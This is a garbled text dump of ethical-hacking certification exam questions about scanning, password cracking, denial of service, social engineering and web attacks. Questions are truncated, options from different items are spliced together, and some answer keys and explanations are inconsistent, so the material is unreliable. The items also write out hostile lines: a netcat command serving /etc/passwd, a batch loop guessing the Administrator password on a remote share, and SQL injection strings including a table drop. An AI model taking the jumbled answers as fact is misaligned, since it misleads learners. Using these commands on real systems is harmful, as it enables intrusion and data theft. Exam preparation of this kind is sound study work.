True B. Obfuscantion C. truying to find an entry into the network. in charge of all aspects of the DoD’s internal network security. the system automaticlly sends out a new password list by encrypted e-mail to the customer. then no damage is done because the password will no be accepted a second time. Record the customer face image to the authentication database. Implement Blometrics based password authentication system. … What effective security solution will you recommend in this case? A. Configure your firewall to block logon attempts of more than three wrong tries C. If something must be kept open.You can always defend yourself by "ignorance of the law" clause. B. Abuffer overflow occurs when a particular operation/function writes more data into a variable then the variable was designed to hold. You are setting up ebanking website (http://www. What technique is Shauna using here? A. Honeypot B. Implement RSA SecureID based authentication system D. Shauna and her employees’ duty is to make sure that hole is not exploited by outside attackers. Question 101: Buffer overflows are one of the top flaws for exploitation on the Internet today.ejacobank. Instead of issuing banking customer with a single password. If someone sees them type the password using shoulder surfing. the customer enters the next password on the list. Active buffer overflow 36 . Stack based buffer overflow B. MiTM or keyloggers. you give them a printed list of 100 unique passwords. Shauna leads a large team of junior security analysts that make sure all entry points are closed off. Once the list of 100 passwords is almost finished. Firewalking Question 99: You are the security administrator of Jaco Banking System located in Boston. As one would expect. Each time the customer needs to log into the e-banking system website. …. the DoD is constantly probed and scanned by outsite IP addresses. The two popular types of buffer overflows prevalent today are: A.com) authentication system. Enable a complex password policy of 20 characters and ask the user to change…. Tunneling D. unless that entry point must be kept open for business purposes. False Question 72: Shauna is the Senior Security Analyst for the Department of Defense. A.

Question 113: More sophisticated IDSs look for common shelicode signatures… 37 . Bill connected to a Rogue access point B. How was Bill able to get Internet access without using an agency laptop? A. The systems are running a host based IDS Question 104: Hampton is the senior security analyst for the city of Columbus in Ohio. Toshiba and Dell laptops share the same hardware address D. The first new systems scanned shows all ports open. Heap based buffer overflow Question 103: You are having trouble obtaining accurate results while conducting a port scan against a target network…. The systems are Web Servers B. you decide to perform a NULL scan with NMAP. Bill brute forced the Mac address ACLs Question 107: WWW wanderers or spiders are programs that traverse many pages in the World Wide Web by recursively retrieving linked pages. Place authenticateion on root directories that will prevent crawling from thers spiders C.txt file in the root of your website with listing of drectories that you don’t want to be crawled. Bill spooted the MAC address of Dell laptop C. The systems have all ports open C. Bill is an IT technician that works with Hampton in the same IT department…. When both steath an connect scans do not work. Dynamic buffer overflow D. Which one of the following statements is most porbably true? A. Search engines like Google… How will you stop web spiders from crawling certain directories on your website? A. The system are running Windows D. Place robots. B. Place “HTTP:NO CRAWL” on the html pages that you don’t want the crawlers to index. His primary responsibility is to ensure that all physical and logical aspects of the city’s computer network are secure from all angles. Enable SSL on the restricted directories which will block these spiders from crawling D.C.

uncompress…. You pull up your hardware WiFi sniffer from your car and tune into 802. such as expensive firewalls.How does a polymorphic shelicode work? A. using loader. What frequency will you tune the Wireless hardware device to? A. This authentication is secure because the password is never transmitted over the network.11a network to sniff the Wireless traffic for sensitive data.15-5. Untrained staff or Ignorant computer users who inadvertently become the weakest link in your security chain Question 133: Mason is the network administrator of ata Machine Systems. 5. He has been pushed aside in promotions due to office politics…. and then executing the derypted shellcode B. Challenge/Response Authentication Question 129: While doing a penetration test. They compress shellcode into normal instructions. They reverse the working instructions into opposite ordder by masking the IDS signatures D. you discover that the organization is using one domain for web publishing…. Presence of “weakest link” in the security chain What is Peter Smith talking about? A. only a randon number and an encrypted randon number are sent A. They convert the shellcode into Unicode. using loader code to decrypt the shellcode.825 GHz Question 132: You went to great lengths to install all the necessary technologies to prevent hacking attacks.. During what phase of the penetration test would you normally discover this? A. even in hashed form. They encrypt the shellcode by XORing values over the shellcode. antivius software. Inc. Question 123: This is an authentication method in which is used to prove that a party knows a password without transmitting the password in any recoverable form over a network. antispam systems and intrusion detection/preventiion tools in your company’s network…. C. Which of the following command Mason should run in Knoppix to permanently erase the data? 38 . Passive Information Gathering Question 131: You come across a WiFi network in your neighborhood.

.0. Send-Safe proxy server B. What tool could Larry use to help evade traps like honeypots? A.1. What method of attack is best suited to crack these password in the shortes amount of time? A.0. On Monday. Dictionary attack D. Brute force attack B. SPECTER relay server Question 145: Stephanie works as a records clerk in a large office building in downtown Chicago. a contractor for the Department of Defense…. What are the next sequence and acknowledgement numbers that the router will send to the victim machine? A.0. Scan the network using Nmap for the services used by these reflectors Question 142: Larry is a criminal hacker with over 20 years of experience in breaking into system. You sniff the traffic and attempt to predict the sequence and acknowledgement numbers to successfully hijack the telnet session. she went to a mandatory secuity awareness class (Security5) put on by her company’s IT… 39 .5 to Cisco router at 10. KFSensor tunneling server D. Sequence nubmer 82980070 Acknowledgement number 17768885 Question 137: Frederickson Seurity Consultants is currently conduction a security audit on the networks of Hawthorn Eterprises. Brute service attack Question 138: Reflective DdoS attacks do not send traffic directly at the targeted host… How would you detect these reflectors on your network? B. $ wipe-fik/dev/hda1 Question 188: You are trying to hijack to telnet session from a victim merchine with IP address 10. Larry’s main objective used to entail defacing government and big corporation websites.A. Honeyd evasion server C. Birthday attack C.0.

$ sudo chrootkit Question 173: Attacker forges a TCP/IP packet. Stealth Firefox D. Stealth IE C. Stealth Anonymizer B. SMURF Attacks Question 181: You have been charged with performing a number of security test against… What would be considered passive scanning? A. What type of Denial of Service attack is represented here? A. SYN Flood attacks D. A statefull inspection firewall D. Unpatched Windwos XP and Windows Server 2003 machines are vulnerable to these attackes. Cookie Disabler Question 147: You perform the following traceroute and notice that hops 19 and 20 both show the same IP address. A Honeypot B. Firewalking 40 . which causes the victim to try opening a connection with itself….What should Stephanie use so that she does not get in trouble for surfing the internet? A. Netcraft B. An application proxying firewall Question 168: Which of the following commands will you run in Linux to check for the presence of rootkits? A. A host based IDs C. Targa attacks C. What does this most likely indicate? A. LAND attacks B. Whois C.

Steganography 41 . ptes. He needs to open port 22 on his firewalls B. Putty cannot make SSH connections Question 379: Michael is a junior security analyst working for the National Security Agency… What technique has Michael used to distuise this keylogging software? A. Never use a password related to the hostname. Never use a password related to your hobbies. Never leave a default password B. He needs to open port 24 on his firewalls C. Harold should use LC4 instead of John the Ripper Question 187: Finding tools to run dictionary and brute forcing attackes against FTP and Web servers is an easy task for hackers. Harold should have used Dmpsec instead of Pwdump6 C. Harold’s dictionary file was not large enough D. Friendly Pinger Question 186: Harold works for Jacobson Unlimited in the IT department as the security manager…. LanManger hashes are broken up into two 7 character fields. domainname… D. B. Use a word that has more than 21 characters from… Question 190: John is the network adminstrator for Frederickson Machinery in Tampa. … What defensive measures will you take to protect your network from these attacks? A. Never use a password that can be found in a dictionary C.… E. Why did the 14 chareacter passwords not take much longer to crack than the 8 character passwords? A.D. … PuTTY Fatal Error: Network error: Connction reset by peer Why was John not able to connect? A. He needs to turn offf statefull inspection on his firewalls D.

DOS attacks which is done accidentally or deliberately C. B. D. Hidden channels Question 374: Bob was frustrated with his competitor. Wrapping C. QUESTION 3: Who is an Ethical Hacker? A. There is nothing that says that a cracker does not get paid for the work he does.. A person whohacksfor ethical reasons B. Answer: C Explanation: The ethical hacker uses the same techniques and skills as a cracker and the motive is to find the security breaches before a cracker does. C. QUESTION 2: What does the term "Ethical Hacking" mean? A. Someone who is using his/her skills for defensive purposes. Someone who is hacking for ethical reasons.B. C. The ethical hacker has authorization from the owner of the target. QUESTION 4: What is "Hacktivism"? 42 . Answer: C Explanation: Ethical hacking is only about defending your self or your employer against malicious persons by using the same techniques and skills. A person whohacksfor an ethical cause C. DOS attacks which involves crashing a netword or system QUESTION 1: What is the essential difference between an 'Ethical Hacker' and a 'Cracker'? A. Simple DDOS attack B. The ethical hacker does it strictly for financial motives unlike a cracker. The ethical hacker is just a cracker who is getting paid. A person whohacksfor offensive purposes Answer: C Explanation: The Ethical hacker is a security professional who applies his hacking skills for defensive purposes. Brownies Inc. Someone who is using his/her skills for ethical reasons. … This process involves human interaction to fix it. A person whohacksfor defensive purposes D. B. D. The ethical hacker does not use the same techniques or skills as a cracker. a ethical hacker has the owners authorization and will get paid even if he does not succeed to penetrate the target. ADS D. Someone who is using his/her skills for offensive purposes. What kind of Denial of Service attack was best illustrated in the scenario above? A. DOS attacks which involves flooding anetwork or system D.

Windows Scan C. D. WHOIS database C.A. B. F QUESTION 14: How does Traceroute map the route that a packet travels from point A to point B? A. XMAS Scan D. It manipulates the value of time to live (TTL) parameter packet to elicit a time exceeded in transit message. The 43 . C. To create a denial of service attack. Hacking ruthlessly C. CHAT rooms B. Answer: C QUESTION 30: Which of the following would be the best reason for sending a single SMTP message to an address that does not exist within the target company? A. Acts of hacktivism are carried out in the belief that proper use of code will have leveraged effects similar to regular activism or civil disobedience. C. Web sites E. Answer: C QUESTION 33: What type of port scan is shown below? A. To gather information about internal hosts used in email treatment. Idle Scan B. To gather information about procedures that are in place to deal with such messages. It manipulated flags within packets to force gateways into generating error messages. None of the above Answer: A Explanation: The term was coined by author/critic Jason Logan Bill Sack in an article about media artist Shu Lea Cheang. E. To verify information about the mail administrator and his address. D. It uses a TCP Timestamp packet that will elicit a time exceed in transit message. C. D. Hacking for a cause B. B. QUESTION 5: Where should a security tester be looking for information that could be used by an attacker against an organization? (Select all that apply) A. Organization's own web site Answer: A. B. An association which groups activists D. Search engines F. SYN Stealth Scan QUESTION 35: An attacker is attempting to telnet into a corporation's system in the DMZ. News groups D. It uses a protocol that will be rejected at the gateways on its way to its destination.

Perform a tcp traceroute to the system using port 53 C. what would you infer from this scan? A. He is attacking an operating system that does not reply to telnet even when open. The attacker is trying to detect machines on the network which have SSL enabled D. B. What is the most probable reason? A. You are in hurry and conducting the scans at the fastest possible speed. The attacker is trying to determine the type of VPN implementation and checking for 44 . 3.insecure. Run an nmap scan with the -v-v option to give a better output D. However. After numerous tries he remains unsuccessful in connecting to the system.insecure. Fragmented packet scan Answer: C Explanation: A TCP Connect scan. He is still unable to connect to the target system. If a port is open the operating system completes the TCP three-way handshake. QUESTION 49: While attempting to discover the remote operating system on the target computer. This scan is eating up most of the network bandwidth and Neil is concerned. D.attacker doesn't want to get caught and is spoofing his IP address.12. Stealth scan C.222: (The 1592 ports scanned but not shown below are in state: filtered) Port State Service 21/tcp open ftp 25/tcp open smtp 53/tcp closed domain 80/tcp open http 443/tcp open https Remote operating system guess: Too many signatures match to reliably guess the OS. named after the Unix connect() system call is the most accurate scanning method. The attacker rechecks that the target system is actually listening on Port 23 and he verifies it with both nmap and hping2. If stealth is not an issue.10ALPHA9 ( www. He needs to use an automated tool to telnet in. you receive the following results from an nmap scan: Starting nmap V. C. and the port scanner immediately closes the connection. Nmap run completed -. It is a worm that is malfunctioning or hardcoded to scan on port 500 C. As a security professional. XMAS scan B.121. QUESTION 78: Neil notices that a single address is generating traffic from its port 500 to port 500 of several other machines on the network.1 IP address (1 host up) scanned in 277. Connect scan D. The firewall is blocking port 23 to that system. It is a network fault and the originating machine is in a network loop B. what type of scan should you run to get very reliable results? A. He cannot spoof his IP and successfully use TCP.483 seconds What should be your next step to identify the OS? A.org/nmap/ <http://www. you don't want to sacrifice reliability for speed. Connect to the active services and review the banner information Answer: D QUESTION 77: You are performing a port scan with nmap. Perform a firewalk with that system as the target IP B.org/nmap/> ) Interesting ports on 172.

The firewall is blocking all the scans to 192.3.80 : 56(84) bytes of data.2. You do not get a response.3.168.4 PING10.3.10 C.3.10 don't get answered. The live hosts will send an ICMP ECHO Reply to the attacker source IP address.10.4 (eth0 10.2.7 ms --. 77 of the ICMP_ECHO packets had an ICMP ID:39612 and Seq:57072.4 flags=RA seq=2 ttl=128 id=55447 win=0 rtt=0.4 flags=RA seq=0 ttl=128 id=54167 win=0 rtt=0.7 ms len=46 ip=10. To check for file and print sharing on Windows systems D.1. What should you do next? A.3.2. hping2 uses stealth TCP packets to connect Answer: C QUESTION 89: Why would an attacker want to perform a scan on port 137? A. 100% packet loss [ceh]# .5. 0 packets received.2. To discover information about a target host using NBTSTAT QUESTION 91: One of the ways to map a targeted network for live hosts is by sending an ICMP ECHO request to the broadcast or the network address.2.8/0. --.4 hping statistic --4 packets tramitted.255.4 flags=RA seq=1 ttl=128 id=54935 win=0 rtt=0. hping2 uses TCP instead of ICMP by default D. 4 packets received.7 ms len=46 ip=10.3.168.1.4 HPING 10. Use NetScan Tools Pro to conduct the scan B. Run NULL TCP hping2 against 192.10.8 ms A.10. 45 .4) from 10.2.4): NO FLAGS are set.1.10 seems to hang without returning any information.4 switch C. You send a ping request to the broadcast address 192. 40 headers + 0 data bytes len=46 ip=10.4 ping statistics --3 packets transmitted. ICMP ID and Seq numbers were most likely set by a tool and not by the operating system QUESTION 86: You ping a target IP to check if the host is up.3.168.2. Why does the host respond to hping2 and not ping packet? [ceh]# ping 10.168.3. 13 of the ICMP_ECHO packets had an ICMP ID:0 and Seq:0.168./hping2 -c 4 -n -i 2 10.3.3.10 Answer: C QUESTION 83: A specific site received 91 ICMP_ECHO packets within 90 minutes from 47 different sites. A basic nmap scan of 192.2.2. you must use ping 10.3.2.3.10 D.2.3. Next you use hping2 tool to ping the target host and you get a response. Run nmap XMAS scan against 192.IPSec QUESTION 80: You want to know whether a packet filter is in front of 192.7/0.3. To discover proxy servers on a network B.8 ms len=46 ip=10. You suspect ICMP is blocked at the firewall. The packets were sent by a worm spoofing the IP addresses of 47 infected sites B.168.4 (10. The request would be broadcasted to all hosts on the targeted network.2. What can you infer from this information? A.1. 0% packet loss round-tripmin/avg/max = 0.168.2.2.1. To disrupt the NetBIOS SMB service on the target host C. Pings to 192. ping packets cannot bypass firewalls B.4 flags=RA seq=3 ttl=128 id=55959 win=0 rtt=0.1.

[root@ceh/root]# ping -b 192. B.168.5. A. The above scenario is wrong. Answer: D QUESTION 98: Bob is acknowledged as a hacker of repute and is popular among visitors of "underground" sites.168.7 ms ------There are 40 computers up and running on the target network. Why? A.255 (192. He 46 . Micah Answer: F QUESTION 122: Eric has discovered a fantastic package of tools named Dsniff on the Internet. what would be the most affective method to bridge the knowledge gap between the "black" hats or crackers and the "white" hats or computer security professionals? (Choose the test answer) A.5. 64 bytes from 192.0-255 C.168.168.5. D. Chang G.1 : 56(84) bytes of data.255 WARNING: pinging broadcast address PING192. QUESTION 99: Peter extracts the SIDs list from Windows 2000 Server machine using the hacking tool "SIDExtractor".168. Somia F. In this context. However.5. You cannot ping a broadcast address. articles and training on risk analysis. this knowledge has a risk associated with it. B. as it can be used for malevolent attacks as well. Make obtaining either a computer security certification or accreditation easier to achieve so more individuals feel that they are a part of something larger than life. Sheela D. Educate everyone with books. Windows machines will not generate an answer (ICMP ECHO Reply) to an ICMP ECHO request aimed at the broadcast address or at the network address. Train more National Guard and reservist in the art of computer security to help out in times of emergency or crises.168.1 ms 64 bytes from 192.5. Here is the output of the SIDs: s-1-5-21-1125394485-807628933-54978560-100Johns s-1-5-21-1125394485-807628933-54978560-652Rebecca s-1-5-21-1125394485-807628933-54978560-412Sheela s-1-5-21-1125394485-807628933-54978560-999Shawn s-1-5-21-1125394485-807628933-54978560-777Somia s-1-5-21-1125394485-807628933-54978560-500chang s-1-5-21-1125394485-807628933-54978560-555Micah From the above list identify the user account with System Administrator privileges.1: icmp_seq=0 ttl=255 time=4.255) from 192.5. D. Hire more computer security monitoring personnel to monitor computer systems and networks. and many have expressed their interest in learning from him. Rebecca C. Bob is willing to share his knowledge with those who are willing to learn. John B.168. Only 13 hosts send a reply while others do not.5: icmp_seq=0 ttl=255 time=5. Shawn E.5. C. Linux machines will not generate an answer (ICMP ECHO Reply) to an ICMP ECHO request aimed at the broadcast address or at the network address. You should send a ping request with this command ping 192. vulnerabilities and safeguards.

LOGIN. you discover that people are able to telnet into the SMTP server on port 25. Eve is trying to connect as an user with Administrator privileges B. she types the following command. The buffer overflow attack has been neutralized by the IDSS B. You also notice "/bin/sh" in the ASCII part of the output. You are assigned the task of analyzing this entry. SQL Slammer C. You figure that the attacker is attempting a buffer overflow attack. ARP Proxy D. LOGIN. For /f "tokens=1 %%a in (hackfile. You notice the value 0x90. Eve is trying to carry out a password crack for user Administrator D. However. The attacker is attempting an exploit that launches a command-line shell QUESTION 140: Study the snort rule given below: From the options below. WebDav B.has learnt to use these tools in his lab and is now ready for real world exploitation. you are concerned about affecting the normal functionality of the email server.1. The attacker is creating a directory on the compromised machine C. He was able to effectively intercept communications between the two entities and establish credentials with both sides of the connections. What would you call this attack? A. USER. From the following options 47 . Eve is trying to escalate privilege of the null user to that of Administrator Answer: C QUESTION 124: Which of the following represents the initial two commands that an IRC client sends to join an IRC network? A. choose the exploit against which this rule applies. Man-in-the-middle C. You would like to block this. NICK B.txt) do net use * \\10. From the command prompt. NICK C. USER Answer: A QUESTION 132: The following is an entry captured by a network IDS. She notices that Alice is using a computer whose port 445 is active and listening. MS Blaster D. The two remote ends of the communication never notice that Eric is relaying the information between the two. A. MyDoom Answer: C QUESTION 158: While examining audit logs. The attacker is attempting a buffer overflow attack and has succeeded D.3\c$ /user:"Administrator" %%a What is Eve trying to do? A. Eve is trying to enumerate all users with Administrative privileges C. Eve uses the ENUM tool to enumerate Alice machine. USER. Interceptor B. As an analyst what would you conclude about the attack? A. Poisoning Attack Answer: B QUESTION 123: Eve is spending her day scanning the library computers. though you do not see any evidence of an attack or other wrong doing. which is the most common NOOP instruction for the Intel processor.2. PASS D.

He has used this modem to dial in to his workstation. All passwords must also use 3 of the 4 following categories: lower case letters. Hashes are sent in clear text over the network. Answer: E QUESTION 159: Windows LAN Manager (LM) hashes are known to be weak. E. Which of the following are known weaknesses of LM? (Choose three) A. Using social engineering. None of the above. You understand that all users are required to use passwords that are at least 8 characters in length. what would be the fastest type of password cracking attack you can run against these hash values and still get results? A. you come to know that they are enforcing strong passwords. How would you resolve this situation? A. Dictionary Attack C. D. Makes use of only 32 bit encryption. Converts passwords to uppercase. Brute Force Attack D. With your existing knowledge of users. deletes the /etc/passwd file when connected to the UDP port 55555 Answer: C Explanation: -l forces netcat to listen for incoming connections. Effective length is 7 characters. capital letters. C. During one of your periodic checks to see how well policy is being observed by the employees. The employee explains that he used the modem because he had to download software for a department project. Reconfigure the firewall B. logs the incoming connections to /etc/passwd file B. Install a network-based IDS D. Shut off the SMTP service on the server. thereby bypassing your firewall. D. Switch from Windows Exchange to UNIX Sendmail. A security breach has occurred as a direct result of this activity. grabs the /etc/passwd file when connected to UDP port 55555 D. you discover an employee has attached a modem to his telephone line and workstation. B. loads the /etc/passwd file to the UDP port 55555 C. Force all connections to use a username and password. Conduct a needs analysis C. Block port 25 at the firewall. numbers and special characters. Hybrid Attack QUESTION 162: You are the Security Administrator of Xtrinity. likely user account names and the possibility that they will choose the easiest passwords possible. B. You write security policies and conduct assesments to protect the company's network. C. Online Attack B.choose how best you can achieve this objective? A. QUESTION 160: You have retrieved the raw hash values from a Windows 2000 Domain Controller. Inc. -u tells netcat to use UDP instead of TCP 48 . Enforce the corporate security policy QUESTION 166: What does the following command in netcat do? nc-l -u -p 55555 < /etc/passwd A.

How do you disable LM authentication in Windows XP? A. Scanning attacks C. Character Encoding D. Session hijacking attacks D.flags.168.microsoft.0. ip == 192.1 and syn. Disable LSASS service in Windows XP C. It deals with the way in which systems convert data from one form to another. Snow B. because an attacker eavesdropping on network traffic will attack the weaker protocol. Session Splicing B.-p 5555 tells netcat to use port 5555 < /etc/passwd tells netcat to grab the /etc/passwd file when connected to.168. Download and install LMSHUT. ip.addr = 192.0. A.com/kb/299656 QUESTION 173: How would you describe an attack where an attacker attempts to deliver the payload over multiple packets over long periods of time with the purpose of defeating simple pattern matching in IDS systems without session reconstruction? A characteristic of this attack would be a continuous stream of small packets. QUESTION 167: What hacking attack is challenge/response authentication used to prevent? A.1 and tcp. Gif-It-Up C.syn D.0.equals on Answer: C QUESTION 205: When Jason moves a file via NFS over the company's network. A successful attack can compromise the user's password.168. NiceText D.equals 192. ip. A. Stop the LM service in Windows XP B.syn B.168. Character Mapping C. Which of the following tool accomplishes this? 49 .1? A. Session Fragmentation Answer: A QUESTION 175: _____ is the process of converting something from one representation to the simplest form. Image Hide Answer: A QUESTION 172: LM authentication is not as strong as Windows NT authentication so you may want to disable its use. Session Hijacking D.1 and tcp. you want to grab a copy of it by sniffing.0. ip.addr==192. Disable LM authentication in the registry D. Replay attacks B. Password cracking attacks Answer: A QUESTION 170: Which of the following steganography utilities exploits the nature of white space and allows the user to conceal information in these white spaces? A.EXE tool from Microsoft website Answer: C Explanation: http://support.168. UCS transformation formats QUESTION 203: Which of the following display filters will you enable in Ethereal to view the three-way handshake for a connection from host 192.0. Session Stealing C.1 and syn = 1 C. Canonicalization B.

What could be the most likely cause? A.address = 10.0. ip. ip = 10. Crafted Channel C. tcpdump -l /var/log/ Answer: B QUESTION 209: ARP poisoning is achieved in _____ steps A.22. ip.0.A. You want to view only packets sent from 10. tcpdump -r log B.src == 10. Covert Channel B.0. Further inspection reveals that they are not responses from the internal hosts' requests but simply responses coming from the Internet. 1 B.0./log C.22 C. nfscopy QUESTION 208: What is the command used to create a binary log file using tcpdump? A.22 Answer: B QUESTION 222: Clive has been monitoring his IDS and sees that there are a huge number of ICMP Echo Reply packets that are being received on the external gateway interface. A hacker tries to decipher a password by using a system. filesnarf D. C. Someone has spoofed Clive's IP address while doing a smurf attack. which subsequently crashes the network B.0. 4 QUESTION 210: How would you describe a simple yet very effective mechanism for sending and receiving unauthorized information or data between machines without alerting any firewalls and IDS's on a network? A. A hacker prevents a legitimate user (or group of users) from accessing a service D. Deceptive Channel QUESTION 211: You have captured some packets in Ethereal.22 B.0. Someone has spoofed Clive's IP address while doing a land attack. tcpdump -vde -r log D.0. Someone has spoofed Clive's IP address while doing a fraggle attack.0. Someone has spoofed Clive's IP address while doing a DoS attack. 2 C.0. 3 D. ip. B.22 D. Answer: A QUESTION 225: How does a denial-of-service attack work? A. webspy C. word. tcpdump -w .equals 10. What filter will you apply? A.0. D. macof B. A hacker attempts to imitate a legitimate user by confusing a computer or even another person C. Bounce Channel D. A hacker uses every character. or letter he or she can think of to defeat authentication Answer: C QUESTION 231: Henry is an attacker and wants to gain control of a system and use it to flood a 50 .

so as to prevent legitimate users from gaining access. What kind of attack is being illustrated here? (Choose the best answer) A. Jane does not suspect anything amiss. and can access Brown Co. She launches an attack similar to that of fraggle. to find the cookie recipe. Spoofing Identity E. Faking Identity Answer: C Explanation: This is a typical case of pretexting.target system with requests. Henry is taking advantage of an incorrect configuration that leads to access with higher-than-expected privilege D. This time she envisages using a different kind of method to attack Brownies Inc. Smurf B. Bubonic C. Email C. Social Engineering D. This is an example of what kind of attack? 51 . SYN Floodfg D. an accountant at Brown Co. What type of attack is Henry using? A. Reverse Engineering C. Jack now has a user name and password. Pretexting is the act of creating and using an invented scenario (the pretext) to persuade a target to release information or perform an action and is usually done over the telephone. Jack tells Jane that there has been a problem with some accounts and asks her to tell him her password 'just to double check our records'. QUESTION 238: Jack Hacker wants to break into Brown Co. Jack can now access Certkiller 's computers with a valid user name and password. Henry uses poorly designed input validation routines to create or alter commands to gain access to unintended data or execute commands Answer: B QUESTION 232: Eve decides to get her hands dirty and tries out a Denial of Service attack that is relatively new to her. Jack calls Jane. Phone B. Ping of Death Answer: A QUESTION 236: What is the most common vehicle for social engineering attacks? A. and parts with her password. to steal the cookie recipe.'s computers. Henry is using a denial of service attack which is a valid threat used by an attacker C. Jacks calls Jane. Reverse Psychology B. pretending to be an administrator from Brown Co. Eve tries to forge the packets and uses the broadcast address. P2P Networks Answer: A Explanation: Pretexting is the act of creating and using an invented scenario (the pretext) to persuade a target to release information or perform an action and is usually done over the telephone. Jane believes that Jack is really an administrator. and tells him her password. Jack tells Jane that there has been a problem with some accounts and asks her to verify her password with him "just to double check our records".'s computers and obtain their secret double fudge cookie recipe.. Henry is executing commands or viewing data outside the intended target path B. In person D. What is the technique that Eve used in the case above? A. an accountant at Certkiller pretending to be an administrator from Certkiller . QUESTION 237: Jack Hacker wants to break into Certkiller 's computers and obtain their secret double fudge cookie recipe.

The attack was social engineering and the firewall did not detect it C. an accountant of the firm befriends him at the canteen and tags along with him on the pretext of appraising him about potential tax benefits. Visitors were allowed to click on a sand clock to mark the progress of the test. setup a mock video camera next to the special card reader adjacent to the secured door D. Advertising and Covering are the three stages of _____ A. Jason waits for Jake to swipe his access card and follows him through the open door into the secure systems area. Security was not compromised as the webpage was hosted internally Answer: B QUESTION 258: How would you prevent session hijacking attacks? 52 . Bob walks up to the employee (still holding the box) and asks the employee to hold the door open so that he can enter. Smooth Talking QUESTION 248: Sabotage. Reverse Software Engineering D. Faking Identity Answer: B QUESTION 243: Bob waits near a secured door. Just as the employee opens the door. The attack did not fall through as the firewall blocked the traffic B. The test was announced to the employees. issue special cards to access secured doors at the company and provide a one-time only brief description of use of the special card B. Reverse Engineering D. Tailgating C. Social Engineering C. He also added some statistics on the webpage. Trailing B. He waits until an employee walks up to the secured door and uses the special card in order to access the restricted area of the target company. to educate all of the employees of the company on best security practices on a recurring basis Answer: D QUESTION 244: Jake works as a system administrator at Acme Corp. How was security compromised and how did the firewall respond? A. Rapid Development Engineering Answer: B QUESTION 249: Dave has been assigned to test the network security of Acme Corp. The firewall protects the network well and allows strict Internet access.A. Swipe Gating D. Dave successfully embeds a keylogger. Jason. Reverse Psychology B. to post a sign that states "no tailgating" next to the special card reader adjacent to the secured door C. Social engineering B. What is the best way to undermine the social engineering activity of tailgating? A. How would you describe Jason's behavior within a security context? A. Spoofing Identity E. Reverse Social Engineering C. He created a webpage to discuss the progress of the tests with employees who were interested in following the test. The attack was deception and security was not directly compromised D. holding a box.

he went through a few scanners that are currently available. SARA. Which of the following options would be your current privileges? A.com. by Advanced Research Organization (http://www-arc.axent. B. D. C. LOCAL_SYSTEM D. They have also verified the IDS logs and found no attacks that could have caused this.A. In order to perform the actions you intend to do. What is the mostly likely way the attacker has been able to modify the price? A. Use wget to download all pages locally for further inspection.bindview. Here are the scanners that he uses: 1. Which of the processes listed below would be a more efficient way of doing this type of validation? A. The server allows you to spawn a shell. Using biometrics access tokens secures sessions against hijacking B. SSL operates at the network layer and S-HTTP operates at the application layer B. IUSR_COMPUTERNAME C. You need to know what your current privileges are within the shell. Whatever account IIS was installed with Answer: C QUESTION 269: You work as security technician at Certkiller .com) 2. you need elevated permission.com/sara) 3. In order for him to check the vulnerability of Certkiller . Using the manual method of telnet to each of the open ports of Certkiller . The security administrators verify the web server and Oracle database have not been compromised directly. Use mget to download all pages locally for further inspection. By using cross site scripting C. There is no way the attacker could do this without directly compromising either the web server or the database QUESTION 278: What are the differences between SSL and S-HTTP? A. SSL operates at the application layer and S-HTTP operates at the transport layer QUESTION 284: Scanning for services is an easy job for Bob as there are so many tools available from the Internet. by Razor (http://razor. Administrator B. What would be the best method to accurately identify the services running on a victim host? A. SSL operates at the transport layer and S-HTTP operates at the application layer D. B. Using hardware-based authentication secures sessions against hijacking D. Using non-Internet protocols like http secures sessions against hijacking C. Using Cheops-ng to identify the devices of Certkiller . 53 .com/tools/) However. Using unpredictable sequence numbers secures sessions against hijacking Answer: D QUESTION 261: You have successfully run a buffer overflow attack against a default IIS installation running on a Windows 2000 Server. By changing hidden form values in a local copy of the web page D. QUESTION 276: An attacker has been successfully modifying the purchase price of items purchased at a web site. you might be required to look through multiple web pages online which can take a long time. By using SQL injection B. SSL operates at the application layer and S-HTTP operates at the network layer C. Use get() to download all pages locally for further inspection. Axent's NetRecon (http://www. there are many other alternative ways to make sure that the services that have been scanned will be more accurate and detailed for Bob. While doing web application testing. VLAD the Scanner. Use get* to download all pages locally for further inspection.

John Stevens reviewed the Web application's logs and found the following entries: Attempted login of unknown user: John Attempted login of unknown user: sysaR Attempted login of unknown user: sencat Attempted login of unknown user: pete ''. They are greeted with a message "Your login information has been mailed to johndoe@gmail. A hybrid attack B. John Stevens was in charge of information security at Bank of Timbuktu. A buffer overflow C. The web application picked up a record at random B. you attempt to insert the following test script into the search area on the company's web site: <script>alert('Testing Testing Testing')</script> Afterwards. QUESTION 288: Bryan notices the error on the web page and asks Liza to enter liza' or '1'='1 in the email field. Using the default port and OS to make a best guess of what services are running on each port for Certkiller . Discretionary Access Control QUESTION 298: You have chosen a 22 character word from the dictionary as your password. Given this attack profile. 16 million years QUESTION 301: Bank of Timbuktu was a medium-sized.com". 200 years D. The web application returned the first record it found C. What vulnerability is detected in the web application here? A.After one month in production. pay bills and conduct online financial business using a Web browser. money was transferred between accounts. transfer money between accounts. The web application emailed the administrator about the error QUESTION 291: While testing web applications.C. It secures information by assigning sensitivity labels on information and comparing this to the level of security a user is operating at. Attempted login of unknown user: ' or 1=1-Attempted login of unknown user: '. Mandatory Access Control B. Role-based Access Control D. 5 minutes B. several customers complained about the Internet enabled banking application. drop table logins-- 54 . 23 days C. The bank has deployed a new Internet-accessible Web application recently. regional financial institution in Timbuktu. Strangely. a pop up box appears on your screen with the text "Testing Testing Testing". Using a vulnerability scanner to try to probe each port to verify or figure out which service is running for Certkiller . How long will it take to crack the password by an attacker? A. the account balances of many bank's customers has been changed! However. money hadn't been removed from the bank. when you press the search button. Instead. using which customers could access their account balances. A. D. Authorized Access Control C. Cross Site Scripting QUESTION 295: _____ ensures that the enforcement of organizational security policy does not rely on voluntary web application user compliance. Password attacks D. What do you think has occurred? A. The server error has caused the application to malfunction D.

